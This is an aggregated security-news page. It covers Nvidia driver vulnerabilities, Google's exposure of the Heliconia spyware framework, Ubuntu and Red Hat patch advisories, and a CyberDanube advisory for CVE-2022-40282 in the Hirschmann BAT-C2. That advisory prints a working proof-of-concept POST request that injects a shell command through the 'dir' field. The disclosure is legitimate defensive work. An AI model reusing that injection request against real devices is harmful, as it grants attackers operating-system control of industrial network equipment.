If unpatched, a host of GPU Display Driver flaws could expose gamers, graphic designers, and others to code execution, denial of service, data tampering, and more.

A new update from Nvidia for its GPU Display Driver includes fixes for a full 29 security vulnerabilities, seven with a base score of more than 7. 

The company's graphics cards are built to accelerate computing processing to support real-time or data-intensive applications. As such, they're known for their use by gamers, graphic designers, and other creative producers, and for artificial intelligence and machine learning. Impacted software products for the update specifically include GeForce, Studio, Nvidia RTX, Quadro, NVS, and Tesla.

The most serious of the bugs are two flaws that exist in the user mode layer for Windows versions, both of which could allow an unauthorized user to execute code, escalate privileges, launch denial-of-service attacks, and achieve data compromise and disclosure, according to the chipmaker:

*   **CVE‑2022‑34669** (CVSS score of 8.8): An unprivileged regular user can access or modify system files or other files that are critical to the application.
*   **CVE‑2022‑34671** (CVSS score of 8.7): An unprivileged regular user can cause an out-of-bounds write.

The display driver for Linux also received a number of updates in this latest security update. 

"Earlier software branch releases that support these products may also be affected," the Nvidia security update said. "If you are using an earlier branch release for which an update version is not listed above, upgrade to the latest branch release." 

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Nvidia GPU Driver Bugs Threaten Device Takeover & More

The Heliconia hacking tool exploited vulnerabilities in Chrome, Windows Defender, and Firefox, according to company security researchers.

The commercial spyware industry has increasingly come under fire for selling powerful surveillance tools to anyone who can pay, from governments to criminals around the world. Across the European Union, details of how spyware has been used to target activists, opposition leaders, lawyers, and journalists in multiple countries have recently touched off scandals and calls for reform. Today, Google's Threat Analysis Group announced action to block one such hacking tool that targeted desktop computers and was seemingly developed by a Spanish firm.

The exploitation framework, dubbed Heliconia, came to Google's attention after a series of anonymous submissions to the Chrome bug reporting program. The disclosures pointed to exploitable vulnerabilities in Chrome, Windows Defender, and Firefox that could be abused to deploy spyware on target devices, including Windows and Linux computers. The submission included source code from the Heliconia hacking framework and called the vulnerabilities Heliconia Noise, Heliconia Soft, and Files. Google says the evidence points to the Barcelona-based tech firm Variston IT as the developer of the hacking framework.

“The findings indicate that we have many small players within the spyware industry, but with strong capabilities related to zero days,” TAG researchers told WIRED, referring to unknown, unpatched vulnerabilities. 

Variston IT did not respond to a request for comment from WIRED. The company's director, Ralf Wegner, told TechCrunch that Variston was not given the opportunity to review Google’s research and could not validate it. He added that he “would be surprised if such item was found in the wild.” Google confirmed that the researchers did not contact Variston IT in advance of publication, as is the company's standard practice in these types of investigations. 

Google, Microsoft, and Mozilla patched the Heliconia vulnerabilities in 2021 and 2022, and Google says it has not detected any current exploitation of the bugs. But evidence in the bug submissions indicates that the framework was likely being used to exploit the flaws starting in 2018 and 2019, long before they were patched. Heliconia Noise exploited a Chrome renderer vulnerability and a sandbox escape, while Heliconia Soft used a malicious PDF laced with a Windows Defender exploit, and Files deployed a group of Firefox exploits for Windows and Linux. TAG collaborated on the research with members of Google's Project Zero bug-hunting group and the Chrome V8 security team.

The fact that Google does not see current evidence of exploitation may mean that the Heliconia framework is now dormant, but it might also indicate that the hacking tool has evolved. “It could be there are other exploits, a new framework, their exploits didn’t cross our systems, or there are other layers now to protect their exploits,” TAG researchers told WIRED.

Ultimately, the group says its goal with this type of research is to shed light on the commercial spyware industry's methods, technical capabilities, and abuses. TAG created detections for Google's Safe Browsing service to warn about Heliconia-related sites and files, and the researchers emphasize that it's always important to keep software up to date.

“The growth of the spyware industry puts users at risk and makes the internet less safe,” TAG wrote in a blog post about the findings. “And while surveillance technology may be legal under national or international laws, they are often used in harmful ways to conduct digital espionage against a range of groups.”

Google Moves to Block Invasive Spanish Spyware Framework

Hirschmann (Belden) BAT-C2 version 8.8.1.0R8 suffers from a remote authenticated command injection vulnerability.

    CyberDanube Security Research 20221124-0-------------------------------------------------------------------------------                title| Authenticated Command Injection              product| Hirschmann (Belden) BAT-C2   vulnerable version| 8.8.1.0R8        fixed version| 09.13.01.00R04           CVE number| CVE-2022-40282               impact| High             homepage| https://hirschmann.com/                     | https://beldensolutions.com                found| 2022-08-01                   by| T. Weber (Office Vienna)                     | CyberDanube Security Research                     | Vienna | St. Pölten                     |                     | https://www.cyberdanube.com-------------------------------------------------------------------------------Vendor description-------------------------------------------------------------------------------"The Technology and Market Leader in Industrial Networking. Hirschmann™develops innovative solutions, which are geared towards its customers’requirements in terms of performance, efficiency and investmentreliability."Source: https://beldensolutions.com/en/Company/About_Us/belden_brands/index.phtmlVulnerable versions-------------------------------------------------------------------------------Hirschmann BAT-C2 / 8.8.1.0R8Vulnerability overview-------------------------------------------------------------------------------1) Authenticated Command InjectionThe web server of the device is prone to an authenticated command injection.It allows an attacker to gain full access to the underlying operating system ofthe device with all implications. If such a device is acting as key device inan industrial network, or controls various critical equipment via serial ports,more extensive damage in the corresponding network can be done by an attacker.Proof of Concept-------------------------------------------------------------------------------1) Authenticated Command InjectionThe command "ping 192.168.1.1" was injected to the system by using thefollowing POST request:===============================================================================POST / HTTP/1.1Host: 192.168.3.150User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: */*Accept-Language: de,en-US;q=0.7,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 75Origin: https://192.168.3.150Authorization: Digest username="admin", realm="config", nonce="4b63bb796252d310", uri="/", algorithm=MD5, response="dbcf03216bd8fbaa15f4b9d9d0fc1d43", qop=auth, nc=0000000a, cnonce="99c14d39557e691d"Referer: https://192.168.3.150/Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originTe: trailersConnection: closeajax=FsCreateDir&dir='%3Bping%20192.168.1.1%3B'&iehack=&submit=Create&cwd=/=============================================================================== The vulnerability was manually verified on an emulated device by using theMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).Solution-------------------------------------------------------------------------------Upgrade to firmware version 09.13.01.00R04 or above.A security bulletin for this vulnerability has been published by the vendor:https://www.belden.com/dfsmedia/f1e38517e0cd4caa8b1acb6619890f5e/15088-source/Workaround-------------------------------------------------------------------------------NoneRecommendation-------------------------------------------------------------------------------CyberDanube recommends customers from Hirschmann to upgrade the firmware to thelatest version available. Furthermore, a full security review by professionalsis recommended.Contact Timeline-------------------------------------------------------------------------------2022-08-03: Contacting Hirschmann via BEL-SM-PSIRT@belden.com; Belden contact             suspects a duplicate. Asked contact for more information.2022-08-18: Belden representative sent more information for clarification.             Highlighted differences between PoCs.2022-08-22: Belden contact confirmed the vulnerability to be no duplicate.2022-08-30: Asked for an update.2022-08-31: Vendor stated, that he will release another security bulletin for             this vulnerability.2022-09-27: Asked for an update.2022-09-28: Vendor is currently testing the new firmware version and has also             been assigned with an CVE number. Draft of security bulletin was             also sent by the security contact.2022-10-12: Asked for an update.2022-10-13: Belden contact stated, that there is no publication date for now as             another patch must be integrated.2022-10-28: Security contact informed us, that the patch will be released             within the next two weeks.2022-11-22: Asked for a status update; Security contact stated, that the             release was delayed due internal reasons.2022-11-23: Vendor sent the final version of the security bulletins. The             release of the new firmware version will be 2022-11-28.2022-11-24: Vendor informed CyberDanube that the release of the bulletin and             the firmware was done on 2022-11-23 by the marketing team.             Coordinated release of security advisory.Web: https://www.cyberdanube.comTwitter: https://twitter.com/cyberdanubeMail: research at cyberdanube dot comEOF T. Weber / @2022

Hirschmann (Belden) BAT-C2 8.8.1.0R8 Command Injection

Ubuntu Security Notice 5728-3 - Jann Horn discovered that the Linux kernel did not properly track memory allocations for anonymous VMA mappings in some situations, leading to potential data structure reuse. A local attacker could use this to cause a denial of service or possibly execute arbitrary code. It was discovered that a race condition existed in the memory address space accounting implementation in the Linux kernel, leading to a use-after-free vulnerability. A local attacker could use this to cause a denial of service or possibly execute arbitrary code.

==========================================================================  
Ubuntu Security Notice USN-5728-3  
November 29, 2022

linux-gcp-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 18.04 LTS

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-gcp-5.4: Linux kernel for Google Cloud Platform (GCP) systems

Details:

Jann Horn discovered that the Linux kernel did not properly track memory  
allocations for anonymous VMA mappings in some situations, leading to  
potential data structure reuse. A local attacker could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-42703)

It was discovered that a race condition existed in the memory address space  
accounting implementation in the Linux kernel, leading to a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-41222)

It was discovered that a race condition existed in the instruction emulator  
of the Linux kernel on Arm 64-bit systems. A local attacker could use this  
to cause a denial of service (system crash). (CVE-2022-20422)

It was discovered that the KVM implementation in the Linux kernel did not  
properly handle virtual CPUs without APICs in certain situations. A local  
attacker could possibly use this to cause a denial of service (host system  
crash). (CVE-2022-2153)

Hao Sun and Jiacheng Xu discovered that the NILFS file system  
implementation in the Linux kernel contained a use-after-free  
vulnerability. A local attacker could use this to cause a denial of service  
(system crash) or possibly execute arbitrary code. (CVE-2022-2978)

Johannes Wikner and Kaveh Razavi discovered that for some Intel x86-64  
processors, the Linux kernel's protections against speculative branch  
target injection attacks were insufficient in some circumstances. A local  
attacker could possibly use this to expose sensitive information.  
(CVE-2022-29901)

Abhishek Shah discovered a race condition in the PF_KEYv2 implementation in  
the Linux kernel. A local attacker could use this to cause a denial of  
service (system crash) or possibly expose sensitive information (kernel  
memory). (CVE-2022-3028)

It was discovered that the Netlink device interface implementation in the  
Linux kernel did not properly handle certain error conditions, leading to a  
use-after-free vulnerability with some network device drivers. A local  
attacker with admin access to the network device could use this to cause a  
denial of service (system crash) or possibly execute arbitrary code.  
(CVE-2022-3625)

It was discovered that the IDT 77252 ATM PCI device driver in the Linux  
kernel did not properly remove any pending timers during device exit,  
resulting in a use-after-free vulnerability. A local attacker could  
possibly use this to cause a denial of service (system crash) or execute  
arbitrary code. (CVE-2022-3635)

Jann Horn discovered a race condition existed in the Linux kernel when  
unmapping VMAs in certain situations, resulting in possible use-after-free  
vulnerabilities. A local attacker could possibly use this to cause a denial  
of service (system crash) or execute arbitrary code. (CVE-2022-39188)

Xingyuan Mo and Gengjia Chen discovered that the Promise SuperTrak EX  
storage controller driver in the Linux kernel did not properly handle  
certain structures. A local attacker could potentially use this to expose  
sensitive information (kernel memory). (CVE-2022-40768)

Sönke Huster discovered that a use-after-free vulnerability existed in the  
WiFi driver stack in the Linux kernel. A physically proximate attacker  
could use this to cause a denial of service (system crash) or possibly  
execute arbitrary code. (CVE-2022-42719)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 18.04 LTS:  
   linux-image-5.4.0-1093-gcp      5.4.0-1093.102~18.04.1  
   linux-image-gcp                 5.4.0.1093.71

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-5728-3  
   https://ubuntu.com/security/notices/USN-5728-1  
   CVE-2022-20422, CVE-2022-2153, CVE-2022-2978, CVE-2022-29901,  
   CVE-2022-3028, CVE-2022-3625, CVE-2022-3635, CVE-2022-39188,  
   CVE-2022-40768, CVE-2022-41222, CVE-2022-42703, CVE-2022-42719

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1093.102~18.04.1

Ubuntu Security Notice USN-5728-3

Red Hat Security Advisory 2022-8669-01 - Kerberos is a network authentication system, which can improve the security of your network by eliminating the insecure practice of sending passwords over the network in unencrypted form. It allows clients and servers to authenticate to each other with the help of a trusted third party, the Kerberos key distribution center. Issues addressed include an integer overflow vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: krb5 security update  
Advisory ID:       RHSA-2022:8669-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8669  
Issue date:        2022-11-29  
CVE Names:         CVE-2022-42898  
====================================================================  
1. Summary:

An update for krb5 is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS EUS (v.9.0) - aarch64, ppc64le, s390x, x86_64

3. Description:

Kerberos is a network authentication system, which can improve the security  
of your network by eliminating the insecure practice of sending passwords  
over the network in unencrypted form. It allows clients and servers to  
authenticate to each other with the help of a trusted third party, the  
Kerberos key distribution center (KDC).

Security Fix(es):

* krb5: integer overflow vulnerabilities in PAC parsing (CVE-2022-42898)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the updated packages, running Kerberos services (krb5kdc,  
kadmin, and kprop) will be restarted automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2140960 - CVE-2022-42898 krb5: integer overflow vulnerabilities in PAC parsing

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

aarch64:  
krb5-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-debugsource-1.19.1-16.el9_0.aarch64.rpm  
krb5-devel-1.19.1-16.el9_0.aarch64.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.aarch64.rpm

ppc64le:  
krb5-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-debugsource-1.19.1-16.el9_0.ppc64le.rpm  
krb5-devel-1.19.1-16.el9_0.ppc64le.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.ppc64le.rpm

s390x:  
krb5-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-debugsource-1.19.1-16.el9_0.s390x.rpm  
krb5-devel-1.19.1-16.el9_0.s390x.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.s390x.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.s390x.rpm

x86_64:  
krb5-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-debugsource-1.19.1-16.el9_0.i686.rpm  
krb5-debugsource-1.19.1-16.el9_0.x86_64.rpm  
krb5-devel-1.19.1-16.el9_0.i686.rpm  
krb5-devel-1.19.1-16.el9_0.x86_64.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.i686.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS EUS (v.9.0):

Source:  
krb5-1.19.1-16.el9_0.src.rpm

aarch64:  
krb5-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-debugsource-1.19.1-16.el9_0.aarch64.rpm  
krb5-libs-1.19.1-16.el9_0.aarch64.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-pkinit-1.19.1-16.el9_0.aarch64.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-server-1.19.1-16.el9_0.aarch64.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-server-ldap-1.19.1-16.el9_0.aarch64.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
krb5-workstation-1.19.1-16.el9_0.aarch64.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.aarch64.rpm  
libkadm5-1.19.1-16.el9_0.aarch64.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.aarch64.rpm

ppc64le:  
krb5-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-debugsource-1.19.1-16.el9_0.ppc64le.rpm  
krb5-libs-1.19.1-16.el9_0.ppc64le.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-pkinit-1.19.1-16.el9_0.ppc64le.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-server-1.19.1-16.el9_0.ppc64le.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-server-ldap-1.19.1-16.el9_0.ppc64le.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
krb5-workstation-1.19.1-16.el9_0.ppc64le.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.ppc64le.rpm  
libkadm5-1.19.1-16.el9_0.ppc64le.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.ppc64le.rpm

s390x:  
krb5-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-debugsource-1.19.1-16.el9_0.s390x.rpm  
krb5-libs-1.19.1-16.el9_0.s390x.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-pkinit-1.19.1-16.el9_0.s390x.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-server-1.19.1-16.el9_0.s390x.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-server-ldap-1.19.1-16.el9_0.s390x.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.s390x.rpm  
krb5-workstation-1.19.1-16.el9_0.s390x.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.s390x.rpm  
libkadm5-1.19.1-16.el9_0.s390x.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.s390x.rpm

x86_64:  
krb5-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-debugsource-1.19.1-16.el9_0.i686.rpm  
krb5-debugsource-1.19.1-16.el9_0.x86_64.rpm  
krb5-libs-1.19.1-16.el9_0.i686.rpm  
krb5-libs-1.19.1-16.el9_0.x86_64.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-libs-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-pkinit-1.19.1-16.el9_0.i686.rpm  
krb5-pkinit-1.19.1-16.el9_0.x86_64.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-pkinit-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-server-1.19.1-16.el9_0.i686.rpm  
krb5-server-1.19.1-16.el9_0.x86_64.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-server-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-server-ldap-1.19.1-16.el9_0.i686.rpm  
krb5-server-ldap-1.19.1-16.el9_0.x86_64.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-server-ldap-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
krb5-workstation-1.19.1-16.el9_0.x86_64.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.i686.rpm  
krb5-workstation-debuginfo-1.19.1-16.el9_0.x86_64.rpm  
libkadm5-1.19.1-16.el9_0.i686.rpm  
libkadm5-1.19.1-16.el9_0.x86_64.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.i686.rpm  
libkadm5-debuginfo-1.19.1-16.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42898  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4ZVs9zjgjWX9erEAQj8jg/+Ott5FtHP+BXP0LQ04Echi73kK+dkfmRD  
DlL3/ZO9XwYJ3nb67L7x6z//B+V9OUAlAuQJqPRdr1YFixrL555xs+XuHJpCACt+  
EFp/s1Spn4gucaVf/bDwPA9WvuDro6CFo9HUv5QrObPyTR0FbbRd+WTbNdx/wuMv  
ESGwvlKYs50nWeuOsYwZugXP//b3RcO/wmlRacsXqjJdqKRE25IYhzwpTx30hoPC  
GmLU8BvI3p9P7dJ+jVA0sjANfcVv9Ls/LtXR9I7cSxNyWVeb7qOS0k1fVaIj0AH0  
6gYOe84YxG32UQtIw2U6Z+z+DnCveEryql/9kI6khurdTlMjJWWSibYnSLbdZqJp  
e27oRBgOORFCxIoKNbFGlXDfW6reaU2fN2Myws0zwZ0rrvgAcfymKJobkfhBn4Ts  
RYZwCEEDmVqblehiLSQ6UiOGPaJ2Za0obHcS8WN0wvOtrPFSz/K/bM3k1iP+NrlF  
hjxM0TZCM+ref7XGFU2JIYwhnI08++QVnm8MSHyIJC/6B8Ufk2UvwvlAIP7KA9wB  
h1V1KOuJW7+j6WNE1XSzIlHVTqACAG0wP14J+FyaI1+BLuNX19bd+NJjGP8TkiYO  
oVak4WI9uO4yrfoFAoRyuC+xRC9WofwX5DHiinzwxHEbkbgROdRF1cxhf3V9P3p5  
WRBmH2ENSjw=AG9x  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8669-01

Red Hat Security Advisory 2022-8679-01 - The USBGuard software framework provides system protection against intrusive USB devices by implementing basic whitelisting and blacklisting capabilities based on device attributes. To enforce a user-defined policy, USBGuard uses the Linux kernel USB device authorization feature.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: usbguard security update  
Advisory ID:       RHSA-2022:8679-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8679  
Issue date:        2022-11-29  
CVE Names:         CVE-2019-25058  
====================================================================  
1. Summary:

An update for usbguard is now available for Red Hat Enterprise Linux 8.4  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.8.4) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

The USBGuard software framework provides system protection against  
intrusive USB devices by implementing basic whitelisting and blacklisting  
capabilities based on device attributes. To enforce a user-defined policy,  
USBGuard uses the Linux kernel USB device authorization feature.

Security Fix(es):

* usbguard: Fix unauthorized access via D-Bus (CVE-2019-25058)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2058465 - CVE-2019-25058 usbguard: Fix unauthorized access via D-Bus

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.8.4):

Source:  
usbguard-1.0.0-2.el8_4.1.src.rpm

aarch64:  
usbguard-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-dbus-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-notifier-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-tools-1.0.0-2.el8_4.1.aarch64.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.aarch64.rpm

noarch:  
usbguard-selinux-1.0.0-2.el8_4.1.noarch.rpm

ppc64le:  
usbguard-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-dbus-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-notifier-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-tools-1.0.0-2.el8_4.1.ppc64le.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.ppc64le.rpm

s390x:  
usbguard-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-dbus-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-notifier-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-tools-1.0.0-2.el8_4.1.s390x.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.s390x.rpm

x86_64:  
usbguard-1.0.0-2.el8_4.1.i686.rpm  
usbguard-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-dbus-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.i686.rpm  
usbguard-dbus-debuginfo-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.i686.rpm  
usbguard-debuginfo-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.i686.rpm  
usbguard-debugsource-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-notifier-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.i686.rpm  
usbguard-notifier-debuginfo-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-tools-1.0.0-2.el8_4.1.x86_64.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.i686.rpm  
usbguard-tools-debuginfo-1.0.0-2.el8_4.1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2019-25058  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY4ZVrtzjgjWX9erEAQhcGw//aM+9IHiIvv1znK1QwbtX0uLCxEme6IVn  
LijSTCBDetqkKxvGW65apZWkQveZx975T9kgG7rY0SX2e5JsTITL1Z7w5DAKp0rV  
jqtb01AV1GMpx4WcZJ7Jrl1YseAF+o1tUtMUTgjXxtieivx4v6BWpeSJ95w2H9AI  
Dlm8LdOuFjLO7RtaMVg0Xhr/b+Ae+sTk/DaEn9k5S7Qh2hGNCfg0o0sOHny6+lYQ  
ZtTcyafLsZ4nR5myt3+BzjxyQEUXP5NuSYGW212R/X5QPbfCgneJHROh11ixczwP  
1nJU3bc1VgW3PbrFtxEpZ3qLyTrjqGeB2V4JthodY3Y5cX85jsMY3QlAwni1ijmI  
PL3hcTXoKUJkTo84mOravY4KVXCwMEIdwXiyENRb77kZbiYl1J07uD4Q5lU3GFTu  
c10dwWL53Aoa7WpkqD6PuqNvfpRK1Qx+a0nn/ebpu5fJXNekcKKPdh8aUnPxqhL0  
i3O1ligEZ88B55Tk2byCHdp7KilCCRGzJw4s7eYfFeLXYM8hEV5kIDw9gprJUA2A  
